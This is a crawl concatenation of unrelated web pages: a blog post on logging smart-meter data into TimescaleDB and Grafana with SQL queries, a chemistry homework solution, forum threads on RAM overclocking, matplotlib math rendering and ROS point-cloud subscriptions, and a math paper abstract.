This is the story of how I used TimescaleDB, Node-RED, Grafana, a Raspberry Pi, some open-source software, and a photodiode to collect data straight from the power meter to plan my photovoltaic system. More than a year after the first data point came in, I have enough insight to answer anything thrown at me—and you can do that too; just carry on reading!
## Knowing Your Power Consumption and the Lack of Sleep
As a normal consumer, at least in Germany, there is almost no way to answer those questions without making stuff up. Most of us send a single meter reading per year for invoicing reasons. That number is divided by 12 months and defines the monthly prepayment. If you paid too much, you’d get some money back. If you paid less than you consumed, you’d get charged the remaining amount.
If you want to know the actual value for a per-month consumption, you can write down one monthly number. If you want to know how much you spend in a day, here’s your daily routine. Going further is impractical, though, since hopefully you’ll be sleeping for at least a few hours a day. So, unless you can convince your spouse to take shifts, one number per hour isn’t really achievable.
If you ended up here thinking this title is clickbait, allow me to disappoint you. It is all real. At the end of 2019, we bought our house—a nice but older one, built in 1968. From the beginning, we knew we wanted a photovoltaic system on the roof. We’re not the power-saving kind of folks. But while researching, we bumped into a wall of questions to figure out how large (in terms of kWh) the system should be and, even more important, what kind of solar battery storage capacity we should consider.
## Requirements Are Key
Since you have to start somewhere, we set a few basic requirements. The roof needed to be replaced in the next few years so an in-roof system would be interesting. Just for the record, with an in-roof system, the shingle roof is completely replaced with solar panels (a bit like with the Tesla solar tiles). Those things tend to be a bit more expensive but look super cool with the photovoltaic system being the actual roof. That said, we opted for a more expensive system with no shingles in sight. Probably a win-win. :-)
Secondly, we knew we wanted battery storage and that it should function as a power outage emergency backup. So, either the batteries themselves or the inverter needed to be able to create their own island power network in case of an outage.
Last but not least, it had to support home automation to better integrate with the new heating solution (a hybrid system with gas and heat pump) rather than just switching a relay or two. I also want to make sure that during a power outage certain devices will not be able to power on to prevent an emergency system overload, which has a limited kW budget.
What I’m not interested in is providing power back to the net. If the system produces more than I can use or store, fair enough, but I want to delay that as long as possible.
## Duct Tape, the Professional's Favorite Tool
New power meters (or “Smart Meters” as we call them in Germany; and no, they’re not smart, no joke here!) have built-in digital communication. Using an infrared LED, the system morses out its data in certain intervals. You just™ have to capture the impulses, decode the data, store them, and be done. Thank you for reading.
Jokes aside, that is the basic concept. But there are many more non-smart things about the Smart Meter, including a built-in photodiode that reacts to a flashlight blinking (see the link above). Yeah, imagine blinking your four-number pin code. I’m not kidding you!
Anyway, the target is clear. We know the steps; let’s get going.
The first step is to capture the infrared light impulsed out from the power meter. I built a very simple but super professional setup with a breadboard and duct tape, the professional’s best friend.
Using duct tape, I taped the photodiode straight to the power meter’s infrared LED. The breadboard just holds a small resistor. Apart from that, everything’s directly connected to the Raspberry Pi’s UART port.
The Raspberry Pi runs the normal Raspbian Light operating system, as well as the decoder software that decodes the SML (Smart Message Language) protocol and forwards it to an MQTT server (for simplicity, I use Eclipse Mosquitto, which is already running for my home automation system). The decoder software is called sml2mqtt and is available on GitHub. Big thanks to its developer, spacemanspiff2.
A Node-RED workflow handles data transformation and writing into TimescaleDB.
## MQTT, Node-RED, and TimescaleDB
We now receive many messages in Node-RED at the other end of the MQTT topic. We know each value based on the last segment of the topic’s name. All messages look similar to the following:
{
"topic": "sml2mqtt/090149534b000403de98/watts_l1",
"qos": 0,
"retain": false,
"_msgid": "6a2cd6bb4459e28c"
}
As mentioned before, the topic’s name also defines what the payload means. The payload itself is the value, and the other properties are just MQTT or Node-RED elements. We can just ignore them.
For our storage, we go with a narrow table setup where one column is used for the values (all of the ones we care for are integers, anyway). We have one column to store the information on what type of value is represented (phase 1-3, total or absolute counter value). Some values are sent more often than others, but we’ll handle that with TimescaleDB’s time_bucket function later.
To create the necessary metrics table and transform it into a hypertable, we connect to the database (for example, using psql) and execute the following queries:
create table metrics
(
created timestamp with time zone default now() not null,
type_id integer not null,
value double precision not null
);
select create_hypertable('metrics', 'created');
As I want to store data for quite some time, I’ll also go with TimescaleDB’s columnar compression. We are now ready to insert our data through Node-RED.
alter table metrics set (timescaledb.compress);
That said, the next step is to jump into Node-RED and create a flow. Nothing too complicated, though. The Node-RED flow is (almost) “as simple as it gets.”
It takes messages from the MQTT topic, passes them through a switch (with one output per interesting value), does some basic transformation (such as ensuring that the value is a valid integer), moves the type and value into SQL parameters, and eventually calls the actual database insert query with those parameters.
As I said, the switch just channels the messages to different outputs depending on the topic’s name. Since I know the last segment of the topic won’t overlap with other topics, I opt for a simple “contains” selector and the name I’m looking for.
The functions behind that simply create a JSON object like this:
{
"type": $id, "value": parseInt(msg.payload) } The term$id is a placeholder for the number of the output (e.g., watts_l1 means 1).
The second transformer step takes the JSON object and transforms it into an array to be passed directly to the database driver.
return {
params: [msg.type, msg.value]
};
Finally, the last node executes the actual database query against the database. Nothing fancy going on here. TimescaleDB uses standard PostgreSQL syntax to write to a hypertable, which means that the full query is just an insert statement, such as:
INSERT INTO metrics (type_id, value)
VALUES ($1,$2);
After deploying the flow, it is time to wait. For about a year.
## Downsampling for Comprehension
Now that we have collected all the data, it is time to start analyzing it. You obviously won’t have to wait for a year. I found it very interesting to keep an eye on changes around weekdays, months, and the different seasons, especially when the heating is on.
When analyzing data, it is always important to understand the typical scope or time frame you want to look at. While we have sub-minute (sometimes even to the second) granularity, analyzing at such a micro level is not useful.
Using TimescaleDB’s continuous aggregates, we can downsample the information into more comprehensible chunks (chunks are data partitions within a table). I decided that one-hour chunks are granular enough to see the changes in consumption over the day. Apart from that, I also wanted to have daily values.
Eventually, I came up with two continuous aggregates to precalculate the necessary data from the actual (real-time) raw values.
The first one calculates the kWh per day. Living in Germany, I really want the day line in the correct time zone (Europe/Berlin). That was not yet (easily) possible when I initially built the continuous aggregate, but it is now!
create materialized view kwh_day_by_day(time, value)
with (timescaledb.continuous) as
SELECT time_bucket('1 day', created, 'Europe/Berlin') AS "time",
round((last(value, created) - first(value, created)) * 100.) / 100. AS value
FROM metrics
WHERE type_id = 5
GROUP BY 1;
The second continuous aggregate performs the same calculation, but instead of downsampling to a day value, it does it by the hour. While the time zone is not strictly required here, I still find it best to add it for clarity.
create materialized view kwh_hour_by_hour(time, value)
with (timescaledb.continuous) as
SELECT time_bucket('01:00:00', metrics.created, 'Europe/Berlin') AS "time",
round((last(value, created) - first(value, created)) * 100.) / 100. AS value
FROM metrics
WHERE type_id = 5
GROUP BY 1;
Finally, it’s time to make things visible.
## Visual Data Analytics
For easier data digestion, I prefer a visual representation. While aggregating data on the command line interface (psql) or with simple query tools would work (the largest resulting dataset would comprise 31 days), it is valuable to have your data presented visually. Especially when you want to use the dashboard with your energy consultant or photovoltaic system engineer.
For visualization, I use Grafana. Easy to install, lots of visual plugins, direct support for TimescaleDB (able to generate more specific time-series queries), and I’m just used to it.
Over time, the Grafana dashboard has grown with more and more aggregations. Most out of curiosity.
Apart from that, the dashboard shows the current consumption per electrical phase, which is updated every few seconds. No live push, but Grafana’s 10-second refresh works great for me.
Today, however, I want to focus on the most interesting measurements:
• Energy consumption by hour of day
• Energy consumption by weekday
• Energy consumption by month
All those aggregations take the last 12 months into account.
## Catch Me in My Sleep
A single day most commonly has 24 hours. Except when you have work, then it probably needs to have 48 hours.
Anyway, energy consumption heavily depends on the hour of the day. That said, if you consider buying a battery system, what you want is to provide at least enough capacity to compensate for your night consumption. And remember that the summer days are “longer” (meaning there is sunlight for more hours). Therefore, I consider at least 6 p.m. to 6 a.m. as night hours. Twelve hours to compensate. With the consumption we have, that is quite a bit.
But first, let’s figure out how much that is (I’m using the median and the maximum):
WITH per_hour AS (
select
time,
value
from kwh_hour_by_hour
where "time" at time zone 'Europe/Berlin' > date_trunc('month', time) - interval '1 year'
order by 1
), hourly AS (
SELECT
extract(HOUR FROM time) * interval '1 hour' as hour,
value
FROM per_hour
)
SELECT
hour,
approx_percentile(0.50, percentile_agg(value)) as median,
max(value) as maximum
FROM hourly
GROUP BY 1
ORDER BY 1;
Since I’m a big fan of CTE (Common Table Expressions) and find them much more readable than a lot of subqueries, you’ll have to live with it. :-)
Anyway, with our already existing continuous aggregation for hour-by-hour consumption, it is as simple as possible to select all of last year’s values. That will result in a list of time buckets and values. The second step is to extract the hour and transform it into an interval (otherwise, Grafana really really won’t like you), and, last but not least, create the actual time-series result set for Grafana to show. Here, I use the Timescale Toolkit functionality for approximate percentiles (which is good enough for me) and tell it to calculate the 50th percentile (the median). The second value is just using the standard PostgreSQL max function.
We could stop here because what we just created is our baseline of consumption, which answers the most important question: “What does a common day look like?”
For us, as you can see, we wake up just shy of 7 a.m. and take a shower. Since we have hot water through electricity, we can see the consumption increasing quite drastically. You can also see that we head to bed sometime between 11 p.m. to midnight.
Finding out the optimal battery capacity is now as simple as adding up either the median or maximum consumption for “night hours,” depending on how much you want to compensate. Remember, it’s also important that the photovoltaic system manages to charge the battery during the day.
## Weekdays, or the Seven Sins
But we don’t want to stop now. There are two more graphs of interest. Let’s move onward to the aggregation by weekdays.
Spoiler alert: there is a difference in consumption. Well, there would be if we were to head to an office to work. But we don’t. Neither me nor my wife. But if you do, there are certainly differences between weekdays and weekends.
The query to generate the graph is quite similar to the one before. However, instead of using the hour-by-hour continuous aggregation, we’ll use the day-by-day one. Eventually, we map the values to their respective (human-readable) names and have Grafana render out the time series:
WITH per_day AS (
select
time,
value
from kwh_day_by_day
where "time" at time zone 'Europe/Berlin' > date_trunc('month', time) - interval '1 year'
order by 1
), daily AS (
SELECT
to_char(time, 'Dy') as day,
value
FROM per_day
), percentile AS (
SELECT
day,
approx_percentile(0.50, percentile_agg(value)) as value
FROM daily
GROUP BY 1
ORDER BY 1
)
SELECT
d.day,
d.ordinal,
pd.value
FROM unnest(array['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat']) WITH ORDINALITY AS d(day, ordinal)
LEFT JOIN percentile pd ON lower(pd.day) = lower(d.day);
The result of our work tells us the median consumption per day of the week. One thing I haven’t figured out yet is why Sundays have higher consumption. Maybe the file server is scrubbing the disks; who knows? :-D
## The 12 Months
Last but not least, we also want to see our consumption on a monthly basis. This is what most people collect today by writing down the counter reading on the first day of every month. But since we have the data on a much higher granularity and already have the other graphs, this is as simple as summing up now.
I’ll spare you the details, but here’s the query. Nothing to see here. At least nothing we haven’t seen before. :-)
WITH per_day AS (
select
time,
value
from kwh_day_by_day
where "time" > now() - interval '1 year'
order by 1
), per_month AS (
SELECT
to_char(time, 'Mon') as month,
sum(value) as value
FROM per_day
GROUP BY 1
)
SELECT
m.month,
m.ordinal,
pd.value
FROM unnest(array['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']) WITH ORDINALITY AS m(month, ordinal)
LEFT JOIN per_month pd ON lower(pd.month) = lower(m.month)
ORDER BY ordinal;
## Why Did I Read Until Here?
If you made it here, congratulations—and I’m sorry. This got much longer than expected, and I already left out quite a few details. If you have any questions, feel free to reach out. Happy to help and answer questions on the setup.
For those amazed at how unprofessional my electrical skills look—I’m scared myself! Jokes aside, this is not the final setup. It was designed for one use case, to collect the information and give me the possibility to make educated decisions. Consider this setup a “temporary workaround.” It will not stay. I promise! Maybe.
The interesting fact about all of this is that time series is much more common in our daily lives than some people think. TimescaleDB, in combination with the other tools, made it perfectly easy to set it up, have it running 24/7 and have me quickly make analytics that would have been impossible without a time-series database.
Unfortunately, I cannot yet present you with a picture of the ready system. Due to shortages all over the world, the system is still not finished.+
Anyway, there are a lot of cool projects and use cases in your home you can use to get started with time-series data, TimescaleDB, and tools such as Grafana and Node-RED. You can sign up for a 30-day free trial here, no credit card required. If you’re interested, check it out! Go!
The open-source relational database for time-series and analytics.
This post was written by | 2022-11-27 01:57:02 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3846285939216614, "perplexity": 2141.749303409477}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710155.67/warc/CC-MAIN-20221127005113-20221127035113-00717.warc.gz"} |
https://www.gradesaver.com/textbooks/science/chemistry/chemistry-the-central-science-13th-edition/chapter-17-additional-aspects-of-aqueous-equilibria-exercises-page-770/17-53c | ## Chemistry: The Central Science (13th Edition)
Published by Prentice Hall
# Chapter 17 - Additional Aspects of Aqueous Equilibria - Exercises - Page 770: 17.53c
#### Answer
$Ba(IO_3)_2$ $Solubility: 5.313 \times 10^{-4}M$
#### Work Step by Step
1. Write the Kps formula: $K_{ps} = [Ba^{+2}]*[{IO_3}^-]^2$ 2. Calculate x: $[Ba(IO_3)_2] = x$ $[Ba^{2+}] = x$ $[{IO_3}^-] = 2x$ $K_{ps} = x * (2x)^2$ $K_{ps} = x * 4x^2$ $6 \times 10^{-10} = 4x^3$ $x^3 = 1.5 \times 10^{-10}$ $x = 5.313 \times 10^{-4} M$
After you claim an answer you’ll have 24 hours to send in a draft. An editor will review the submission and either publish your submission or provide feedback. | 2019-11-21 07:43:40 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5812004208564758, "perplexity": 3994.755262300834}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496670743.44/warc/CC-MAIN-20191121074016-20191121102016-00515.warc.gz"} |
https://www.mersenneforum.org/showthread.php?s=4ba2f718ea092f432d60018284fd17e6&p=508748 | mersenneforum.org Overclocking RAM doesn’t seem to do anything
User Name Remember Me? Password
Register FAQ Search Today's Posts Mark Forums Read
2019-02-16, 20:47 #1 simon389 Aug 2013 1278 Posts Overclocking RAM doesn’t seem to do anything I have DDR 3600 in my Intel 9800X. It’s an 8 core CPU with quad channel memory. I have the CPU stable in Prime 95 LL doublechecks at 4.0Ghz (with AVX512 enabled in Prime95 v. 29.5 build 9). My question is that the LL seems to crunch at the same speed if the RAM is set at 3400Mhz (underclocked) or 3800Mhz (overclocked). Is this normal? I thought prime 95 was memory bound so having the same iterations/ms despite being clocked 400Mhz higher seems strange to me.
2019-02-16, 22:48 #2 VBCurtis "Curtis" Feb 2005 Riverside, CA 467510 Posts It may well be that 3400 quad-channel is enough to feed the CPU; try comparing 3000 to 3400, or 2666 to 3400.
2019-02-17, 04:36 #3
simon389
Aug 2013
3·29 Posts
Quote:
Originally Posted by VBCurtis It may well be that 3400 quad-channel is enough to feed the CPU; try comparing 3000 to 3400, or 2666 to 3400.
The 3400 is definitely faster than the 2666. Maybe it is enough. Perhaps I should have gone for the outrageously priced 10-core at $1000 a pop! 🙄 2019-02-17, 07:09 #4 PhilF Feb 2005 Colorado 2·5·59 Posts Quote: Originally Posted by simon389 The 3400 is definitely faster than the 2666. Maybe it is enough. Perhaps I should have gone for the outrageously priced 10-core at$1000 a pop! 🙄
The i7-9800X has a memory clock speed of 2666, so without overclocking, using memory speeds greater than 2666 will result in very little improvement. The good news, of course, is that you have 4 channels of DDR4-2666 speed. I'm jealous.
The only way to fully utilize your fast memory would be to overclock by lowering the CPU's multiplier then raising the motherboard's clock speed. But with all the problems you have had achieving stability I would recommend you not do that, at least for now.
2019-02-17, 09:50 #5 M344587487 "Composite as Heck" Oct 2017 2×383 Posts Depending on the motherboard and RAM setting an OC that sticks may be tricky, I'd triple check that the settings have stuck. In most memory-intensive applications the sub-timings also make a big difference to performance but someone has said it makes little difference for Prime95. Still, if you've ruled out a forgetful mobo and have the time to tinker you may be able to rule out sub-timings by using the same basic ones (tCL, tRCD, tRP, tRAS, https://www.masterslair.com/memory-r...-trcd-trp-tras ) at 3400, 3600 and 3800.
2019-02-17, 20:58 #6 dcheuk Jan 2019 Pittsburgh, PA 11·23 Posts Hello! I've compared couple memory options on a 9700k with 4680k fft running ll tests. It's a z390 mb w/ 4 slots and 9700k is dual channel memory, and 8 cores w/o ht, yes it's an i7... It does seem like oc memory doesn't help as much, after like 3600mhz memory becomes noticably more expensive. - 1 x 8gb (single rank) at 2666mhz cl17 gets me around ~9.5-10ms/it (3 cores, start bottlenecking i presume using 4th core and so on) - 2 x 8gb (single rank) at 3000mhz cl15 gets me ~6ms/it (4 cores) - 4 x 8gb (single rank) at 2666mhz cl13 gets me ~5ms/it (5 cores) - 4 x 8gb (dual rank) at 3400mhz cl17 gets me ~4.8ms/it (5 cores) - 4 x 16gb (dual rank) at 3600mhz cl17 gets me ~4ms/it (5 cores) - 2 x 8gb (single rank) at 4600mhz cl19 gets me ~3.8ms/it (6 cores) I settled with the 4 x 16gb at the end. I am not sure if OC the cpu would help, I never tried, my cpu runs around 55-60F running p95 24/7. I am really jealous too that you have an 9800x, I thought about going for that setup, but 9800x + x299 + 4 extra memory sticks = higher cost, if I have done that I can only afford like ... integrated graphics for my gpu. Last fiddled with by dcheuk on 2019-02-17 at 21:00
Thread Tools
Similar Threads Thread Thread Starter Forum Replies Last Post theboss24611 Information & Answers 7 2017-10-18 19:17 wildrabbitt Hardware 16 2015-03-12 02:12 Primeinator Information & Answers 12 2013-09-16 16:20 esqrkim Hardware 7 2010-06-26 08:15 VJS Prime Sierpinski Project 23 2009-04-12 03:35
All times are UTC. The time now is 01:10.
Fri Mar 5 01:10:38 UTC 2021 up 91 days, 21:21, 0 users, load averages: 3.44, 3.09, 3.08
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
This forum has received and complied with 0 (zero) government requests for information.
Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation.
A copy of the license is included in the FAQ. | 2021-03-05 01:10:38 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22146137058734894, "perplexity": 8049.610605770844}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178369553.75/warc/CC-MAIN-20210304235759-20210305025759-00266.warc.gz"} |
https://discourse.matplotlib.org/t/multiline-equations-misuse-in-our-part-or-wishlist-item-for-mpl/11093 | # Multiline equations: misuse in our part or wishlist item for mpl?
Hi all,
in the NIPY documentation, we're heavily taking advantage of mpl's
math support, and for the most part it's working great. But having it
in there, we may have gotten a bit carried away... If you look at this
page:
http://neuroimaging.scipy.org/site/doc/manual/html/users/glm_spec.html
its reST sources here:
http://neuroimaging.scipy.org/site/doc/manual/html/_sources/users/glm_spec.txt
Contain text like:
/begin quote
"""
Typically, the events occur in groups, say odd events are labelled
*a*, even ones *b*. We might rewrite this as
.. math::
E = \delta_{(t_1,a)} + \delta_{(t_2,b)} + \delta_{(t_3,a)} + \dots +
\delta_{t_{10},b}
This type of experiment can be represented by two counting processes
:math:(E_a, E_b) defined as
.. math::
\begin{aligned}
E_a(t) &= \sum_{t_j, \text{$j$ odd}} 1_{\{t_j \leq t\}} \\
E_b(t) &= \sum_{t_j, \text{$j$ even}} 1_{\{t_j \leq t\}}
\end{aligned}
These delta-function responses are effectively events of duration 0
and infinite height.
""" / end quote
In the final PDF
(http://neuroimaging.scipy.org/site/doc/manual/nipy.pdf) that all
renders fine, since it's 'real' latex doing the work. However, the
HTML linked above renders the first equation fine, while the multiline
one doesn't work.
Is this something possible with today's MPL but where we are just not
making the right calls, or is it a missing feature. If the latter, is
it realistic to expect it to be added, or should we rather plan for
avoiding such type of typesetting in our docs or switching math
engines for the html docs? Or is the feature 'almost there' but
slightly buggy?
Any hints much appreciated, I just wasn't sure whether this would be a
bug report, feature request or just seeking advice...
Cheers,
f
Multiline equations are not currently supported by the mathtext engine. It's the alignment stuff that makes it more than just a "throw a vbox together". It's a good feature request -- go ahead and add it to the tracker if you're really interested in it -- but I don't know if I'll have time to do this myself in the near future. I'm happy to help show someone around the code...
Of course, in your case, you could also investigate one of the other math rendering directives included with Sphinx.
Mike
Fernando Perez wrote:
···
Hi all,
in the NIPY documentation, we're heavily taking advantage of mpl's
math support, and for the most part it's working great. But having it
in there, we may have gotten a bit carried away... If you look at this
page:
http://neuroimaging.scipy.org/site/doc/manual/html/users/glm_spec.html
its reST sources here:
http://neuroimaging.scipy.org/site/doc/manual/html/_sources/users/glm_spec.txt
Contain text like:
/begin quote
"""
Typically, the events occur in groups, say odd events are labelled
*a*, even ones *b*. We might rewrite this as
.. math::
E = \delta_{(t_1,a)} + \delta_{(t_2,b)} + \delta_{(t_3,a)} + \dots +
\delta_{t_{10},b}
This type of experiment can be represented by two counting processes
:math:(E_a, E_b) defined as
.. math::
\begin{aligned}
E_a(t) &= \sum_{t_j, \text{$j$ odd}} 1_{\{t_j \leq t\}} \\
E_b(t) &= \sum_{t_j, \text{$j$ even}} 1_{\{t_j \leq t\}}
\end{aligned}
These delta-function responses are effectively events of duration 0
and infinite height.
""" / end quote
In the final PDF
(http://neuroimaging.scipy.org/site/doc/manual/nipy.pdf) that all
renders fine, since it's 'real' latex doing the work. However, the
HTML linked above renders the first equation fine, while the multiline
one doesn't work.
Is this something possible with today's MPL but where we are just not
making the right calls, or is it a missing feature. If the latter, is
it realistic to expect it to be added, or should we rather plan for
avoiding such type of typesetting in our docs or switching math
engines for the html docs? Or is the feature 'almost there' but
slightly buggy?
Any hints much appreciated, I just wasn't sure whether this would be a
bug report, feature request or just seeking advice...
Cheers,
f
------------------------------------------------------------------------------
This SF.net email is sponsored by:
High Quality Requirements in a Collaborative Environment.
http://p.sf.net/sfu/www-ibm-com
_______________________________________________
Matplotlib-devel mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/matplotlib-devel
--
Michael Droettboom
Science Software Branch
Operations and Engineering Division
Space Telescope Science Institute
Operated by AURA for NASA
Hi Mike,
Multiline equations are not currently supported by the mathtext engine.
It's the alignment stuff that makes it more than just a "throw a vbox
together". It's a good feature request -- go ahead and add it to the
tracker if you're really interested in it -- but I don't know if I'll have
time to do this myself in the near future. I'm happy to help show someone
around the code...
Many thanks for the info. I did file it here, so you guys can track
it for when someone has a chance to tackle it:
https://sourceforge.net/tracker/?func=detail&aid=2766156&group_id=80706&atid=560723
Of course, in your case, you could also investigate one of the other math
rendering directives included with Sphinx.
For now, that seems the most prudent course of action for us, since I
don't think we can tackle the mpl code right now.
Best,
f
···
On Wed, Apr 15, 2009 at 11:26 AM, Michael Droettboom <[email protected]...> wrote: | 2021-10-18 10:06:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9374018311500549, "perplexity": 5321.740934241038}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585201.94/warc/CC-MAIN-20211018093606-20211018123606-00609.warc.gz"} |
https://answers.ros.org/question/369349/cant-subscribe-to-poincloud2/ | # Cant subscribe to PoinCloud2 [closed]
Hallo, Can someone explain me the difference of the two publishers?
(1)
pub_point_cloud_ = create_publisher<PointCloud2>("points", rclcpp::SensorDataQoS());
(2)
pub_point_cloud_ = create_publisher<PointCloud2>("points", 1);
In the case of the first publisher, I can't subscribe to the PointCloud message as follows which I don't understand. Moreover, I cannot display the points of the message in rviz2.
d435_test_2 = this->create_subscription<sensor_msgs::msg::PointCloud2>(
"/points", 1, std::bind(&ObjectDetectionNode::test_2_callback, this, std::placeholders::_1));
void test_2_callback(const sensor_msgs::msg::PointCloud2::SharedPtr msgs)
{
std::cout << "start_//color/image_raw-------" << "\n";
}
When I use publisher 2 I can do everything normally.
Please give me a short explanation. An example of how to make a subscriber for the first publisher would also be nice
Thanks for the help
edit retag reopen merge delete | 2021-10-26 22:13:26 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.21278135478496552, "perplexity": 5079.938067593098}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587926.9/warc/CC-MAIN-20211026200738-20211026230738-00072.warc.gz"} |
https://questioncove.com/updates/532f0febe4b09ca30f90cfa8 | OpenStudy (anonymous):
Which of the following is equal to 5?
3 years ago
OpenStudy (anonymous):
3 years ago
OpenStudy (anonymous):
b because sqrt25=5
3 years ago
OpenStudy (acxbox22):
true
3 years ago
OpenStudy (anonymous):
b because 5 x 5 is 25. To find the square root, you multiply a number by itself and since 5 x 5 is 25, that is the answer. :)
3 years ago
Similar Questions: | 2017-11-22 01:35:48 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8297730684280396, "perplexity": 8637.659817887383}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934806447.28/warc/CC-MAIN-20171122012409-20171122032409-00181.warc.gz"} |
https://projecteuclid.org/euclid.ade/1366895243 | ### Sign changing solutions of nonlinear elliptic equations
#### Abstract
This paper is concerned with a class of nonlinear elliptic Dirichlet problems approximating degenerate equations. If the degeneration set consists of $k$ connected components, by using variational methods, it is proved the existence of $k^{2}$ distinct nodal solutions, having exactly two nodal regions, whose positive and negative parts concentrate near subsets of the degeneration set.
#### Article information
Source
Adv. Differential Equations Volume 1, Number 6 (1996), 1025-1052.
Dates
First available in Project Euclid: 25 April 2013
Mathematical Reviews number (MathSciNet)
MR1409898
Zentralblatt MATH identifier
0864.35044
#### Citation
